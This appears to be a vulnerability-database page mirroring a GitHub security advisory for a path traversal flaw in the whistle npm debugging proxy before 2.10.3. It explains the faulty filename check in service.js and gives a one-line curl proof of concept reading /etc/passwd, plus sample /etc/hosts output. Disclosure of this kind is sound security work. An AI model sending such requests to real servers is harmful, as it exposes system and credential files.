Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-3vfr-4gwf-qxfp

Опубликовано: 25 авг. 2026
Источник: github
Github: Прошло ревью
CVSS4: 8.7

Описание

Whistle vulnerable to path traversal

This bug was found by nova, which is an automated tool from group of Song Wu, intern, Zhejiang University; BoWang, independent researcher; Xingwei Lin, Zhejiang University.

Vulnerability detail:

In service.js, inside app.get('/cgi-bin/temp/get', ...): var filename = req.query.filename; if (TEMP_FILE_RE.test(filename)) { filename = path.join(TEMP_FILES_PATH, filename); } getFile(filename, ...);

Only when filename matches the temp/ pattern does it get joined to the safe directory TEMP_FILES_PATH.

If it does not match that pattern, the code does not block the request. Instead, it directly uses the user-supplied filename for file reading.

In other words: if you pass passwd, it will read passwd.

POC: curl -s "http://127.0.0.1:8899/cgi-bin/temp/get?filename=/etc/passwd"

response:

xiaoming@192 ~ % curl -s "http://127.0.0.1:8899/cgi-bin/temp/get?filename=/etc/hosts" {"ec":0,"value":"##\n# Host Database\n#\n# localhost is used to configure the loopback interface\n# when the system is booting. Do not change this entry.\n##\n127.0.0.1\tlocalhost\n255.255.255.255\tbroadcasthost\n::1 localhost\n199.232.68.133 raw.githubusercontent.com\n199.232.68.133 user-images.githubusercontent.com\n199.232.68.133 avatars2.githubusercontent.com\n199.232.68.133 avatars1.githubusercontent.com\n127.0.0.1 lanyundev.com\n\n127.0.0.1 www.proxifier.com\n127.0.0.1 proxifier.com\n140.82.116.4 github.com\n\n# This line is auto added by aTrustAgent, do not modify, or aTrustAgent may unable to work\n127.0.0.1\tlocalhost.sangfor.com.cn\n\n"}%

Пакеты

Наименование

whistle

npm
Затронутые версииВерсия исправления

< 2.10.3

2.10.3

EPSS

Процентиль: 49%
0.00669
Низкий

8.7 High

CVSS4

Дефекты

CWE-22

Связанные уязвимости

nvd
около 2 месяцев назад

Whistle is an HTTP, HTTP2, HTTPS, and WebSocket debugging proxy. Prior to 2.10.3, lib/service/service.js handles GET /cgi-bin/temp/get by reading req.query.filename, joining it to TEMP_FILES_PATH only when it matches the temporary file pattern, and otherwise passing the user-supplied filename directly to getFile, allowing a remote attacker to read arbitrary files such as /etc/passwd. This issue is reported as fixed in version 2.10.3.

EPSS

Процентиль: 49%
0.00669
Низкий

8.7 High

CVSS4

Дефекты

CWE-22